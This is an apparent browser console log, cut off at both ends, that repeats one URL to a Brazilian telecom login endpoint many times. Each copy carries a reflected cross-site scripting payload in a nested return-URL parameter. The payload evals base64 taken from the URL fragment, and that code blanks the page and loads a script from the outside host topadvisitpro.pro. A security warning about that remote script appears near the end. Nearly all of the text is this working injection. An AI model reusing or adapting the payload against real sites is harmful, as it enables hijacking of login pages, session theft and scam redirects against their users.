c7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
network	error	URL: https://www.googletagmanager.com/gtm.js?id=GTM-XXXX Message: Failed to load resource: the server responded with a status of 404 ()
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
security	warning	URL: http://topadvisitpro.pro/lion/222gdhj/temp.js Message: An iframe which has both allow-scripts and allow-same-origin for its sandbox attribute can escape its sandboxing.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMb